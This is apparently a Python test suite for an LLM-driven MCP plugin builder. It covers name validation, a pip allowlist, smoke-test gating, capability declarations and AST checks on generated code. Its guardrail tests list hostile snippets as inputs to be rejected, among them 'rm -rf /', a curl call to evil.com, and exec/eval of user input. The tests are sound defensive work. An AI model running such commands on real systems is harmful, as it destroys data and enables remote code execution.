"""
Plugin builder MCP plugin tests — Issue #30.

The builder is a meta-plugin: its tools generate other MCP plugins from a
natural-language description, install pip deps, run an in-process smoke test,
and register the result with the live MCPOrchestrator.

All side effects (LLM call, pip install, smoke runner, filesystem write) are
injected so unit tests run hermetically — no real LLM calls, no real
`pip install`, no real subprocess, no real file I/O outside a tmp dir.
"""
import asyncio
import json
import sys
import textwrap
from pathlib import Path

import pytest

sys.path.insert(0, str(Path(__file__).parent.parent.parent))

from cerebral.mcp.orchestrator import MCPOrchestrator, Plugin, Tool, ToolResult


# ---------------------------------------------------------------------------
# Fixtures — minimal generated plugin payload returned by the LLM
# ---------------------------------------------------------------------------

_GENERATED_SERVER = textwrap.dedent('''
    """Generated by builder."""
    from cerebral.mcp.orchestrator import Tool, ToolResult

    PLUGIN_NAME = "weatherbug"
    REQUIRED_CAPABILITIES = frozenset({"external_data_read"})


    class WeatherbugPlugin:
        name = PLUGIN_NAME

        def list_tools(self):
            return [
                Tool(
                    name="weatherbug_ping",
                    description="Returns 'pong' - a self-contained smoke test target.",
                    plugin=PLUGIN_NAME,
                    schema={"type": "object", "properties": {}},
                )
            ]

        async def call_tool(self, tool_name, args):
            if tool_name == "weatherbug_ping":
                return ToolResult(content="pong")
            return ToolResult(content=f"Unknown tool: {tool_name}", is_error=True)


    def create():
        return WeatherbugPlugin()
''').strip()

_GENERATED_README = "# weatherbug\n\nGenerated by Felix's plugin builder.\n"

_GENERATED_PAYLOAD = {
    "name": "weatherbug",
    "server_py": _GENERATED_SERVER,
    "readme_md": _GENERATED_README,
    "pip_deps": [],
    "smoke_tool": "weatherbug_ping",
    "smoke_args": {},
    # Issue #44 — builder payload must include the declared capabilities.
    "required_capabilities": ["external_data_read"],
}


def _make_llm_fn(payload=None):
    """Returns a fake llm_fn that yields a single canned payload."""
    payload = payload or _GENERATED_PAYLOAD

    def llm_fn(description, suggested_name=None):
        # Honour suggested_name override so callers can disambiguate
        if suggested_name and suggested_name != payload["name"]:
            return {**payload, "name": suggested_name}
        return dict(payload)

    return llm_fn


def _make_recording_pip(success=True):
    calls = []

    def pip_install_fn(dep):
        calls.append(dep)
        if not success:
            raise RuntimeError(f"pip install {dep} failed")

    return pip_install_fn, calls


def _make_recording_smoke(passes=True):
    calls = []

    async def smoke_runner_fn(plugin, tool_name, args):
        calls.append((plugin.name, tool_name, args))
        if not passes:
            raise RuntimeError("smoke test failed: tool raised TypeError")
        result = await plugin.call_tool(tool_name, args)
        if result.is_error:
            raise RuntimeError(f"smoke tool returned error: {result.content}")
        return result

    return smoke_runner_fn, calls


# ---------------------------------------------------------------------------
# Cycle 1 — happy path: create writes files, installs deps, runs smoke, registers
# ---------------------------------------------------------------------------


class TestBuilderCreateHappyPath:
    @pytest.mark.asyncio
    async def test_create_writes_server_and_readme(self, tmp_path):
        from plugins.builder import BuilderPlugin

        orc = MCPOrchestrator()
        smoke_fn, _ = _make_recording_smoke()
        pip_fn, _ = _make_recording_pip()

        builder = BuilderPlugin(
            orchestrator=orc,
            plugins_dir=tmp_path,
            llm_fn=_make_llm_fn(),
            pip_install_fn=pip_fn,
            smoke_runner_fn=smoke_fn,
        )

        result = await builder.call_tool(
            "builder_create",
            {"description": "A weather bug. Just respond pong."},
        )
        assert not result.is_error, result.content

        server_py = tmp_path / "weatherbug" / "server.py"
        readme_md = tmp_path / "weatherbug" / "README.md"
        assert server_py.is_file(), "server.py should be written to plugins/<name>/"
        assert readme_md.is_file(), "README.md should be written alongside server.py"
        assert "WeatherbugPlugin" in server_py.read_text()

    @pytest.mark.asyncio
    async def test_create_calls_pip_install_for_each_declared_dep(self, tmp_path):
        from plugins.builder import BuilderPlugin

        payload = dict(_GENERATED_PAYLOAD, pip_deps=["requests", "beautifulsoup4"])
        orc = MCPOrchestrator()
        smoke_fn, _ = _make_recording_smoke()
        pip_fn, pip_calls = _make_recording_pip()

        builder = BuilderPlugin(
            orchestrator=orc,
            plugins_dir=tmp_path,
            llm_fn=_make_llm_fn(payload),
            pip_install_fn=pip_fn,
            smoke_runner_fn=smoke_fn,
            pip_allowlist=("requests", "beautifulsoup4"),
        )

        result = await builder.call_tool("builder_create", {"description": "x"})
        assert not result.is_error, result.content
        assert pip_calls == ["requests", "beautifulsoup4"]

    @pytest.mark.asyncio
    async def test_create_runs_smoke_test_against_generated_plugin(self, tmp_path):
        from plugins.builder import BuilderPlugin

        orc = MCPOrchestrator()
        smoke_fn, smoke_calls = _make_recording_smoke()
        pip_fn, _ = _make_recording_pip()

        builder = BuilderPlugin(
            orchestrator=orc,
            plugins_dir=tmp_path,
            llm_fn=_make_llm_fn(),
            pip_install_fn=pip_fn,
            smoke_runner_fn=smoke_fn,
        )

        result = await builder.call_tool("builder_create", {"description": "x"})
        assert not result.is_error, result.content
        assert len(smoke_calls) == 1
        plugin_name, tool_name, args = smoke_calls[0]
        assert plugin_name == "weatherbug"
        assert tool_name == "weatherbug_ping"
        assert args == {}

    @pytest.mark.asyncio
    async def test_create_registers_with_orchestrator_on_smoke_pass(self, tmp_path):
        from plugins.builder import BuilderPlugin

        orc = MCPOrchestrator()
        smoke_fn, _ = _make_recording_smoke()
        pip_fn, _ = _make_recording_pip()

        builder = BuilderPlugin(
            orchestrator=orc,
            plugins_dir=tmp_path,
            llm_fn=_make_llm_fn(),
            pip_install_fn=pip_fn,
            smoke_runner_fn=smoke_fn,
        )

        result = await builder.call_tool("builder_create", {"description": "x"})
        assert not result.is_error, result.content
        tool_names = [t.name for t in orc.list_tools()]
        assert "weatherbug_ping" in tool_names
        # And it routes correctly:
        ping = await orc.call_tool("weatherbug_ping", {})
        assert ping.content == "pong"

    @pytest.mark.asyncio
    async def test_create_returns_plugin_name_and_tool_count(self, tmp_path):
        from plugins.builder import BuilderPlugin

        orc = MCPOrchestrator()
        smoke_fn, _ = _make_recording_smoke()
        pip_fn, _ = _make_recording_pip()

        builder = BuilderPlugin(
            orchestrator=orc,
            plugins_dir=tmp_path,
            llm_fn=_make_llm_fn(),
            pip_install_fn=pip_fn,
            smoke_runner_fn=smoke_fn,
        )

        result = await builder.call_tool("builder_create", {"description": "x"})
        assert not result.is_error, result.content
        data = json.loads(result.content)
        assert data["name"] == "weatherbug"
        assert data["tool_count"] == 1
        assert data["registered"] is True


# ---------------------------------------------------------------------------
# Cycle 2 — name validation and collision rejection
# ---------------------------------------------------------------------------


class TestBuilderNameValidation:
    @pytest.mark.asyncio
    @pytest.mark.parametrize(
        "bad_name",
        [
            "Weather",  # uppercase
            "weather-bug",  # dash
            "weather.bug",  # dot
            "../escape",  # path traversal
            "weather/bug",  # slash
            "1weather",  # leading digit
            "",  # empty
            "weather bug",  # space
        ],
    )
    async def test_invalid_names_rejected(self, tmp_path, bad_name):
        from plugins.builder import BuilderPlugin

        payload = dict(_GENERATED_PAYLOAD, name=bad_name)
        orc = MCPOrchestrator()
        smoke_fn, smoke_calls = _make_recording_smoke()
        pip_fn, pip_calls = _make_recording_pip()

        builder = BuilderPlugin(
            orchestrator=orc,
            plugins_dir=tmp_path,
            llm_fn=_make_llm_fn(payload),
            pip_install_fn=pip_fn,
            smoke_runner_fn=smoke_fn,
        )

        result = await builder.call_tool("builder_create", {"description": "x"})
        assert result.is_error
        assert "name" in result.content.lower()
        # Nothing was installed, smoke-tested, or written:
        assert pip_calls == []
        assert smoke_calls == []
        # Empty/path-traversal names normalize to tmp_path itself, so skip the
        # existence check there — we already verified is_error and no side effects.
        if bad_name and "/" not in bad_name and ".." not in bad_name:
            assert not (tmp_path / bad_name).exists()

    @pytest.mark.asyncio
    async def test_existing_plugin_directory_rejected(self, tmp_path):
        from plugins.builder import BuilderPlugin

        # Pre-existing plugin dir
        (tmp_path / "weatherbug").mkdir()
        (tmp_path / "weatherbug" / "server.py").write_text("# already here")

        orc = MCPOrchestrator()
        smoke_fn, smoke_calls = _make_recording_smoke()
        pip_fn, pip_calls = _make_recording_pip()

        builder = BuilderPlugin(
            orchestrator=orc,
            plugins_dir=tmp_path,
            llm_fn=_make_llm_fn(),
            pip_install_fn=pip_fn,
            smoke_runner_fn=smoke_fn,
        )

        result = await builder.call_tool("builder_create", {"description": "x"})
        assert result.is_error
        assert "exists" in result.content.lower()
        assert smoke_calls == []
        # Existing file untouched:
        assert (tmp_path / "weatherbug" / "server.py").read_text() == "# already here"

    @pytest.mark.asyncio
    async def test_existing_flat_plugin_file_rejected(self, tmp_path):
        from plugins.builder import BuilderPlugin

        # Pre-existing flat-style plugin
        (tmp_path / "weatherbug.py").write_text("PLUGIN_NAME = 'weatherbug'\n")

        orc = MCPOrchestrator()
        smoke_fn, _ = _make_recording_smoke()
        pip_fn, _ = _make_recording_pip()

        builder = BuilderPlugin(
            orchestrator=orc,
            plugins_dir=tmp_path,
            llm_fn=_make_llm_fn(),
            pip_install_fn=pip_fn,
            smoke_runner_fn=smoke_fn,
        )

        result = await builder.call_tool("builder_create", {"description": "x"})
        assert result.is_error
        assert "exists" in result.content.lower()


# ---------------------------------------------------------------------------
# Cycle 3 — smoke-test failure leaves the world clean
# ---------------------------------------------------------------------------


class TestBuilderSmokeFailure:
    @pytest.mark.asyncio
    async def test_smoke_failure_does_not_register(self, tmp_path):
        from plugins.builder import BuilderPlugin

        orc = MCPOrchestrator()
        smoke_fn, _ = _make_recording_smoke(passes=False)
        pip_fn, _ = _make_recording_pip()

        builder = BuilderPlugin(
            orchestrator=orc,
            plugins_dir=tmp_path,
            llm_fn=_make_llm_fn(),
            pip_install_fn=pip_fn,
            smoke_runner_fn=smoke_fn,
        )

        result = await builder.call_tool("builder_create", {"description": "x"})
        assert result.is_error
        assert "smoke" in result.content.lower()
        assert "weatherbug" not in [p.name for p in orc._plugins.values()]

    @pytest.mark.asyncio
    async def test_smoke_failure_does_not_persist_plugin_files(self, tmp_path):
        from plugins.builder import BuilderPlugin

        orc = MCPOrchestrator()
        smoke_fn, _ = _make_recording_smoke(passes=False)
        pip_fn, _ = _make_recording_pip()

        builder = BuilderPlugin(
            orchestrator=orc,
            plugins_dir=tmp_path,
            llm_fn=_make_llm_fn(),
            pip_install_fn=pip_fn,
            smoke_runner_fn=smoke_fn,
        )

        await builder.call_tool("builder_create", {"description": "x"})
        assert not (tmp_path / "weatherbug").exists(), (
            "Failed builds must not leave files in plugins/"
        )

    @pytest.mark.asyncio
    async def test_smoke_failure_returns_error_message_with_reason(self, tmp_path):
        from plugins.builder import BuilderPlugin

        orc = MCPOrchestrator()
        smoke_fn, _ = _make_recording_smoke(passes=False)
        pip_fn, _ = _make_recording_pip()

        builder = BuilderPlugin(
            orchestrator=orc,
            plugins_dir=tmp_path,
            llm_fn=_make_llm_fn(),
            pip_install_fn=pip_fn,
            smoke_runner_fn=smoke_fn,
        )

        result = await builder.call_tool("builder_create", {"description": "x"})
        assert result.is_error
        # Surface the underlying RuntimeError text so the user can debug:
        assert "TypeError" in result.content or "smoke" in result.content.lower()


# ---------------------------------------------------------------------------
# Cycle 4 — pip-install failures and allowlist enforcement
# ---------------------------------------------------------------------------


class TestBuilderPipInstall:
    @pytest.mark.asyncio
    async def test_pip_install_failure_aborts_creation(self, tmp_path):
        from plugins.builder import BuilderPlugin

        payload = dict(_GENERATED_PAYLOAD, pip_deps=["requests"])
        orc = MCPOrchestrator()
        smoke_fn, smoke_calls = _make_recording_smoke()
        pip_fn, _ = _make_recording_pip(success=False)

        builder = BuilderPlugin(
            orchestrator=orc,
            plugins_dir=tmp_path,
            llm_fn=_make_llm_fn(payload),
            pip_install_fn=pip_fn,
            smoke_runner_fn=smoke_fn,
            pip_allowlist=("requests",),
        )

        result = await builder.call_tool("builder_create", {"description": "x"})
        assert result.is_error
        assert "pip" in result.content.lower() or "install" in result.content.lower()
        assert smoke_calls == [], "Smoke test should not run when pip install fails"
        assert not (tmp_path / "weatherbug").exists()

    @pytest.mark.asyncio
    async def test_dep_outside_allowlist_rejected(self, tmp_path):
        from plugins.builder import BuilderPlugin

        # Dep not in allowlist
        payload = dict(_GENERATED_PAYLOAD, pip_deps=["sketchy-malware-package"])
        orc = MCPOrchestrator()
        smoke_fn, _ = _make_recording_smoke()
        pip_fn, pip_calls = _make_recording_pip()

        builder = BuilderPlugin(
            orchestrator=orc,
            plugins_dir=tmp_path,
            llm_fn=_make_llm_fn(payload),
            pip_install_fn=pip_fn,
            smoke_runner_fn=smoke_fn,
            pip_allowlist=("requests", "beautifulsoup4"),
        )

        result = await builder.call_tool("builder_create", {"description": "x"})
        assert result.is_error
        assert "allowlist" in result.content.lower() or "not permitted" in result.content.lower()
        assert pip_calls == [], "Disallowed deps must not be installed"

    @pytest.mark.asyncio
    async def test_dep_with_version_pin_matches_allowlist(self, tmp_path):
        """`requests==2.31.0` should pass when `requests` is in the allowlist."""
        from plugins.builder import BuilderPlugin

        payload = dict(_GENERATED_PAYLOAD, pip_deps=["requests==2.31.0"])
        orc = MCPOrchestrator()
        smoke_fn, _ = _make_recording_smoke()
        pip_fn, pip_calls = _make_recording_pip()

        builder = BuilderPlugin(
            orchestrator=orc,
            plugins_dir=tmp_path,
            llm_fn=_make_llm_fn(payload),
            pip_install_fn=pip_fn,
            smoke_runner_fn=smoke_fn,
            pip_allowlist=("requests",),
        )

        result = await builder.call_tool("builder_create", {"description": "x"})
        assert not result.is_error, result.content
        assert pip_calls == ["requests==2.31.0"]


# ---------------------------------------------------------------------------
# Cycle 5 — generated-code security guardrails
# ---------------------------------------------------------------------------


class TestBuilderCodeGuardrails:
    @pytest.mark.asyncio
    async def test_missing_PLUGIN_NAME_rejected(self, tmp_path):
        from plugins.builder import BuilderPlugin

        bad_server = textwrap.dedent('''
            class P:
                name = "x"
                def list_tools(self): return []
                async def call_tool(self, t, a): pass

            def create(): return P()
        ''').strip()

        payload = dict(_GENERATED_PAYLOAD, server_py=bad_server)
        orc = MCPOrchestrator()
        smoke_fn, _ = _make_recording_smoke()
        pip_fn, _ = _make_recording_pip()

        builder = BuilderPlugin(
            orchestrator=orc,
            plugins_dir=tmp_path,
            llm_fn=_make_llm_fn(payload),
            pip_install_fn=pip_fn,
            smoke_runner_fn=smoke_fn,
        )

        result = await builder.call_tool("builder_create", {"description": "x"})
        assert result.is_error
        assert "PLUGIN_NAME" in result.content

    @pytest.mark.asyncio
    async def test_missing_create_function_rejected(self, tmp_path):
        from plugins.builder import BuilderPlugin

        bad_server = textwrap.dedent('''
            PLUGIN_NAME = "weatherbug"
            class P:
                name = "weatherbug"
                def list_tools(self): return []
                async def call_tool(self, t, a): pass
        ''').strip()

        payload = dict(_GENERATED_PAYLOAD, server_py=bad_server)
        orc = MCPOrchestrator()
        smoke_fn, _ = _make_recording_smoke()
        pip_fn, _ = _make_recording_pip()

        builder = BuilderPlugin(
            orchestrator=orc,
            plugins_dir=tmp_path,
            llm_fn=_make_llm_fn(payload),
            pip_install_fn=pip_fn,
            smoke_runner_fn=smoke_fn,
        )

        result = await builder.call_tool("builder_create", {"description": "x"})
        assert result.is_error
        assert "create" in result.content.lower()

    @pytest.mark.asyncio
    @pytest.mark.parametrize(
        "dangerous_snippet",
        [
            "import os; os.system('rm -rf /')",
            "from os import system",
            "__import__('os').system('curl evil.com')",
            "exec(input())",
            "eval(user_input)",
        ],
    )
    async def test_dangerous_patterns_rejected(self, tmp_path, dangerous_snippet):
        from plugins.builder import BuilderPlugin

        bad_server = textwrap.dedent(f'''
            PLUGIN_NAME = "weatherbug"
            from cerebral.mcp.orchestrator import Tool, ToolResult

            {dangerous_snippet}

            class P:
                name = PLUGIN_NAME
                def list_tools(self): return []
                async def call_tool(self, t, a): return ToolResult(content="")
            def create(): return P()
        ''').strip()

        payload = dict(_GENERATED_PAYLOAD, server_py=bad_server)
        orc = MCPOrchestrator()
        smoke_fn, smoke_calls = _make_recording_smoke()
        pip_fn, _ = _make_recording_pip()

        builder = BuilderPlugin(
            orchestrator=orc,
            plugins_dir=tmp_path,
            llm_fn=_make_llm_fn(payload),
            pip_install_fn=pip_fn,
            smoke_runner_fn=smoke_fn,
        )

        result = await builder.call_tool("builder_create", {"description": "x"})
        assert result.is_error
        assert "unsafe" in result.content.lower() or "forbidden" in result.content.lower()
        assert smoke_calls == [], "Unsafe code must never reach the smoke runner"
        assert not (tmp_path / "weatherbug").exists()


# ---------------------------------------------------------------------------
# Cycle 6 — list_generated and re-run smoke
# ---------------------------------------------------------------------------


class TestBuilderListGenerated:
    @pytest.mark.asyncio
    async def test_list_generated_empty_initially(self, tmp_path):
        from plugins.builder import BuilderPlugin

        builder = BuilderPlugin(
            orchestrator=MCPOrchestrator(),
            plugins_dir=tmp_path,
            llm_fn=_make_llm_fn(),
            pip_install_fn=_make_recording_pip()[0],
            smoke_runner_fn=_make_recording_smoke()[0],
        )

        result = await builder.call_tool("builder_list_generated", {})
        assert not result.is_error
        data = json.loads(result.content)
        assert data["generated"] == []

    @pytest.mark.asyncio
    async def test_list_generated_returns_only_builder_created_plugins(self, tmp_path):
        from plugins.builder import BuilderPlugin

        # Pre-existing flat plugin (should NOT appear)
        (tmp_path / "ambient.py").write_text("PLUGIN_NAME='ambient'\n")

        builder = BuilderPlugin(
            orchestrator=MCPOrchestrator(),
            plugins_dir=tmp_path,
            llm_fn=_make_llm_fn(),
            pip_install_fn=_make_recording_pip()[0],
            smoke_runner_fn=_make_recording_smoke()[0],
        )

        await builder.call_tool("builder_create", {"description": "x"})

        result = await builder.call_tool("builder_list_generated", {})
        data = json.loads(result.content)
        assert "weatherbug" in data["generated"]
        assert "ambient" not in data["generated"]


# ---------------------------------------------------------------------------
# Cycle 7 — tool list shape
# ---------------------------------------------------------------------------


class TestBuilderToolList:
    def test_all_tools_prefixed_with_builder(self):
        from plugins.builder import BuilderPlugin

        builder = BuilderPlugin(
            orchestrator=MCPOrchestrator(),
            plugins_dir=Path("/tmp/x"),
            llm_fn=_make_llm_fn(),
            pip_install_fn=_make_recording_pip()[0],
            smoke_runner_fn=_make_recording_smoke()[0],
        )
        tools = builder.list_tools()
        assert len(tools) >= 2
        for tool in tools:
            assert tool.name.startswith("builder_"), (
                f"All builder tools must be prefixed with 'builder_' (#23 LEARNINGS) — "
                f"got {tool.name!r}"
            )

    def test_create_tool_in_list(self):
        from plugins.builder import BuilderPlugin

        builder = BuilderPlugin(
            orchestrator=MCPOrchestrator(),
            plugins_dir=Path("/tmp/x"),
            llm_fn=_make_llm_fn(),
            pip_install_fn=_make_recording_pip()[0],
            smoke_runner_fn=_make_recording_smoke()[0],
        )
        names = [t.name for t in builder.list_tools()]
        assert "builder_create" in names
        assert "builder_list_generated" in names


# ---------------------------------------------------------------------------
# Cycle 8 — orchestrator subdir discovery (so generated plugins survive restarts)
# ---------------------------------------------------------------------------


class TestSubdirDiscovery:
    def test_discover_plugins_loads_subdir_server_py(self, tmp_path):
        """Plugins generated as plugins/<name>/server.py auto-load on next discovery."""
        sub = tmp_path / "weatherbug"
        sub.mkdir()
        (sub / "server.py").write_text(_GENERATED_SERVER)

        orc = MCPOrchestrator()
        orc.discover_plugins(tmp_path)

        names = [p.name for p in orc._plugins.values()]
        assert "weatherbug" in names

    def test_discover_plugins_loads_both_flat_and_subdir(self, tmp_path):
        """Mixing plugins/foo.py and plugins/bar/server.py both load."""
        # Flat plugin
        flat = tmp_path / "flatone.py"
        flat.write_text(_GENERATED_SERVER.replace("weatherbug", "flatone").replace(
            "WeatherbugPlugin", "FlatPlugin"
        ))
        # Subdir plugin
        sub = tmp_path / "subbed"
        sub.mkdir()
        (sub / "server.py").write_text(_GENERATED_SERVER.replace(
            "weatherbug", "subbed"
        ).replace("WeatherbugPlugin", "SubbedPlugin"))

        orc = MCPOrchestrator()
        orc.discover_plugins(tmp_path)
        names = sorted(p.name for p in orc._plugins.values())
        assert "flatone" in names
        assert "subbed" in names

    def test_discover_plugins_skips_subdir_without_server_py(self, tmp_path):
        """A bare subdir without server.py is silently skipped (no crash)."""
        (tmp_path / "_cache").mkdir()
        (tmp_path / "empty_subdir").mkdir()

        orc = MCPOrchestrator()
        orc.discover_plugins(tmp_path)  # should not raise
        assert orc._plugins == {}


# ---------------------------------------------------------------------------
# Cycle 9 — REQUIRED_CAPABILITIES in the builder pipeline (Issue #44)
# ---------------------------------------------------------------------------


class TestBuilderRequiredCapabilities:
    @pytest.mark.asyncio
    async def test_missing_required_capabilities_in_payload_rejected(self, tmp_path):
        from plugins.builder import BuilderPlugin

        payload = {k: v for k, v in _GENERATED_PAYLOAD.items() if k != "required_capabilities"}
        orc = MCPOrchestrator()
        smoke_fn, smoke_calls = _make_recording_smoke()
        pip_fn, _ = _make_recording_pip()

        builder = BuilderPlugin(
            orchestrator=orc,
            plugins_dir=tmp_path,
            llm_fn=_make_llm_fn(payload),
            pip_install_fn=pip_fn,
            smoke_runner_fn=smoke_fn,
        )

        result = await builder.call_tool("builder_create", {"description": "x"})
        assert result.is_error
        assert "required_capabilities" in result.content
        assert smoke_calls == []
        assert not (tmp_path / "weatherbug").exists()

    @pytest.mark.asyncio
    async def test_unknown_capability_in_payload_rejected(self, tmp_path):
        from plugins.builder import BuilderPlugin

        payload = dict(_GENERATED_PAYLOAD, required_capabilities=["fs_read", "telepathy"])
        orc = MCPOrchestrator()
        smoke_fn, smoke_calls = _make_recording_smoke()
        pip_fn, _ = _make_recording_pip()

        builder = BuilderPlugin(
            orchestrator=orc,
            plugins_dir=tmp_path,
            llm_fn=_make_llm_fn(payload),
            pip_install_fn=pip_fn,
            smoke_runner_fn=smoke_fn,
        )

        result = await builder.call_tool("builder_create", {"description": "x"})
        assert result.is_error
        assert "telepathy" in result.content
        assert smoke_calls == []
        assert not (tmp_path / "weatherbug").exists()

    @pytest.mark.asyncio
    async def test_builder_injects_constant_when_llm_omits_it(self, tmp_path):
        """If the LLM emits server.py without REQUIRED_CAPABILITIES, the
        builder prepends a deterministic declaration from the payload so the
        plugin survives a Cerebral restart."""
        from plugins.builder import BuilderPlugin

        server_without_constant = textwrap.dedent('''
            from cerebral.mcp.orchestrator import Tool, ToolResult

            PLUGIN_NAME = "weatherbug"

            class WeatherbugPlugin:
                name = PLUGIN_NAME
                def list_tools(self):
                    return [Tool(name="weatherbug_ping", description="d", plugin=PLUGIN_NAME)]
                async def call_tool(self, tool_name, args):
                    return ToolResult(content="pong")

            def create():
                return WeatherbugPlugin()
        ''').strip()

        payload = dict(
            _GENERATED_PAYLOAD,
            server_py=server_without_constant,
            required_capabilities=["fs_read", "external_data_read"],
        )
        orc = MCPOrchestrator()
        smoke_fn, _ = _make_recording_smoke()
        pip_fn, _ = _make_recording_pip()

        builder = BuilderPlugin(
            orchestrator=orc,
            plugins_dir=tmp_path,
            llm_fn=_make_llm_fn(payload),
            pip_install_fn=pip_fn,
            smoke_runner_fn=smoke_fn,
        )

        result = await builder.call_tool("builder_create", {"description": "x"})
        assert not result.is_error, result.content

        written = (tmp_path / "weatherbug" / "server.py").read_text()
        assert "REQUIRED_CAPABILITIES" in written
        assert "external_data_read" in written
        assert "fs_read" in written

    @pytest.mark.asyncio
    async def test_builder_passes_capabilities_to_orchestrator_on_register(self, tmp_path):
        from plugins.builder import BuilderPlugin

        orc = MCPOrchestrator()
        smoke_fn, _ = _make_recording_smoke()
        pip_fn, _ = _make_recording_pip()

        builder = BuilderPlugin(
            orchestrator=orc,
            plugins_dir=tmp_path,
            llm_fn=_make_llm_fn(),
            pip_install_fn=pip_fn,
            smoke_runner_fn=smoke_fn,
        )

        result = await builder.call_tool("builder_create", {"description": "x"})
        assert not result.is_error, result.content
        assert orc.required_capabilities_for("weatherbug") == frozenset(
            {"external_data_read"}
        )

    @pytest.mark.asyncio
    async def test_payload_with_non_iterable_required_capabilities_rejected(self, tmp_path):
        from plugins.builder import BuilderPlugin

        payload = dict(_GENERATED_PAYLOAD, required_capabilities=123)
        orc = MCPOrchestrator()
        smoke_fn, _ = _make_recording_smoke()
        pip_fn, _ = _make_recording_pip()

        builder = BuilderPlugin(
            orchestrator=orc,
            plugins_dir=tmp_path,
            llm_fn=_make_llm_fn(payload),
            pip_install_fn=pip_fn,
            smoke_runner_fn=smoke_fn,
        )

        result = await builder.call_tool("builder_create", {"description": "x"})
        assert result.is_error
        assert "required_capabilities" in result.content
        assert not (tmp_path / "weatherbug").exists()


# ---------------------------------------------------------------------------
# Cycle 10 — AST-completeness check is mandatory in the builder pipeline
# (Issue #47).
#
# Static-pattern inspectability (#46) catches dangerous primitives. The AST
# walker (#47) catches *under-declaration*: a generated plugin that walks
# `shutil.rmtree(...)` but declares only `fs_read` is clean against the
# static scan but missing a `fs_delete` declaration. The builder runs the
# check on the staged source before persisting; on failure no files are
# moved into `plugins/<name>/` and the orchestrator is not asked to
# register.
# ---------------------------------------------------------------------------


def _under_declared_server_py() -> str:
    """A generated plugin that contains an `os.remove` call site in a
    helper function — the static AST walker sees it, but the smoke runner
    doesn't execute it (smoke runs `weatherbug_ping` which returns pong).
    The point of the test is that the AST check fires regardless of
    runtime reachability."""
    return textwrap.dedent('''
        """Generated by builder."""
        import os
        from cerebral.mcp.orchestrator import Tool, ToolResult

        PLUGIN_NAME = "weatherbug"
        REQUIRED_CAPABILITIES = frozenset({"external_data_read"})


        def _drop_cache(path):
            # Reachable by the AST walker; never called by the smoke tool.
            os.remove(path)


        class WeatherbugPlugin:
            name = PLUGIN_NAME

            def list_tools(self):
                return [
                    Tool(
                        name="weatherbug_ping",
                        description="d",
                        plugin=PLUGIN_NAME,
                        schema={"type": "object", "properties": {}},
                    )
                ]

            async def call_tool(self, tool_name, args):
                if tool_name == "weatherbug_ping":
                    return ToolResult(content="pong")
                return ToolResult(content=f"Unknown tool: {tool_name}", is_error=True)


        def create():
            return WeatherbugPlugin()
    ''').strip()


class TestBuilderAstCompleteness:
    @pytest.mark.asyncio
    async def test_under_declared_call_site_rejected(self, tmp_path):
        from plugins.builder import BuilderPlugin

        payload = dict(
            _GENERATED_PAYLOAD,
            server_py=_under_declared_server_py(),
            required_capabilities=["external_data_read"],
        )
        orc = MCPOrchestrator()
        smoke_fn, smoke_calls = _make_recording_smoke()
        pip_fn, _ = _make_recording_pip()

        builder = BuilderPlugin(
            orchestrator=orc,
            plugins_dir=tmp_path,
            llm_fn=_make_llm_fn(payload),
            pip_install_fn=pip_fn,
            smoke_runner_fn=smoke_fn,
        )

        result = await builder.call_tool("builder_create", {"description": "x"})
        assert result.is_error
        # Failure message names the offending call + the missing class.
        assert "os.remove" in result.content
        assert "fs_delete" in result.content
        # Side effect protection: smoke runner never fired (the AST check
        # gates BEFORE the smoke run), no files moved into plugins_dir,
        # nothing registered.
        assert smoke_calls == []
        assert not (tmp_path / "weatherbug").exists()
        assert "weatherbug" not in {p for p in orc._plugins}

    @pytest.mark.asyncio
    async def test_complete_declaration_passes_and_registers(self, tmp_path):
        """Same source, declaration extended to include fs_delete — the
        check passes and the rest of the pipeline runs as before."""
        from plugins.builder import BuilderPlugin

        payload = dict(
            _GENERATED_PAYLOAD,
            server_py=_under_declared_server_py(),
            required_capabilities=["external_data_read", "fs_delete"],
        )
        orc = MCPOrchestrator()
        smoke_fn, smoke_calls = _make_recording_smoke()
        pip_fn, _ = _make_recording_pip()

        builder = BuilderPlugin(
            orchestrator=orc,
            plugins_dir=tmp_path,
            llm_fn=_make_llm_fn(payload),
            pip_install_fn=pip_fn,
            smoke_runner_fn=smoke_fn,
        )

        result = await builder.call_tool("builder_create", {"description": "x"})
        assert not result.is_error, result.content
        assert smoke_calls == [("weatherbug", "weatherbug_ping", {})]
        assert (tmp_path / "weatherbug" / "server.py").exists()
        assert orc.required_capabilities_for("weatherbug") == frozenset(
            {"external_data_read", "fs_delete"}
        )

    @pytest.mark.asyncio
    async def test_over_declared_passes(self, tmp_path):
        """A payload that declares more than the AST walker can detect from
        the source is fine — over-declaration is intentional. The default
        `_GENERATED_SERVER` has no flagged calls; declaring extra classes
        beyond `external_data_read` must not trip the check."""
        from plugins.builder import BuilderPlugin

        payload = dict(
            _GENERATED_PAYLOAD,
            required_capabilities=[
                "external_data_read",
                "fs_read",
                "fs_write",
                "clipboard",
            ],
        )
        orc = MCPOrchestrator()
        smoke_fn, _ = _make_recording_smoke()
        pip_fn, _ = _make_recording_pip()

        builder = BuilderPlugin(
            orchestrator=orc,
            plugins_dir=tmp_path,
            llm_fn=_make_llm_fn(payload),
            pip_install_fn=pip_fn,
            smoke_runner_fn=smoke_fn,
        )

        result = await builder.call_tool("builder_create", {"description": "x"})
        assert not result.is_error, result.content

    @pytest.mark.asyncio
    async def test_syntax_error_in_generated_source_surfaces_cleanly(self, tmp_path):
        """If the LLM emits malformed Python, the AST check raises
        SyntaxError. The builder catches and reports — does NOT crash the
        plugin and does NOT persist files."""
        from plugins.builder import BuilderPlugin

        broken_source = textwrap.dedent('''
            from cerebral.mcp.orchestrator import Tool, ToolResult
            PLUGIN_NAME = "weatherbug"
            REQUIRED_CAPABILITIES = frozenset({"external_data_read"})
            def create():
                return None
            def half_open(:  # syntax error
        ''').strip()
        payload = dict(_GENERATED_PAYLOAD, server_py=broken_source)
        orc = MCPOrchestrator()
        smoke_fn, _ = _make_recording_smoke()
        pip_fn, _ = _make_recording_pip()

        builder = BuilderPlugin(
            orchestrator=orc,
            plugins_dir=tmp_path,
            llm_fn=_make_llm_fn(payload),
            pip_install_fn=pip_fn,
            smoke_runner_fn=smoke_fn,
        )

        result = await builder.call_tool("builder_create", {"description": "x"})
        assert result.is_error
        assert "syntax" in result.content.lower()
        assert not (tmp_path / "weatherbug").exists()

    @pytest.mark.asyncio
    async def test_pip_install_skipped_when_ast_check_fails(self, tmp_path):
        """AST completeness runs BEFORE pip install — a malformed
        declaration shouldn't side-effect pip even with a vetted allowlist."""
        from plugins.builder import BuilderPlugin

        payload = dict(
            _GENERATED_PAYLOAD,
            server_py=_under_declared_server_py(),
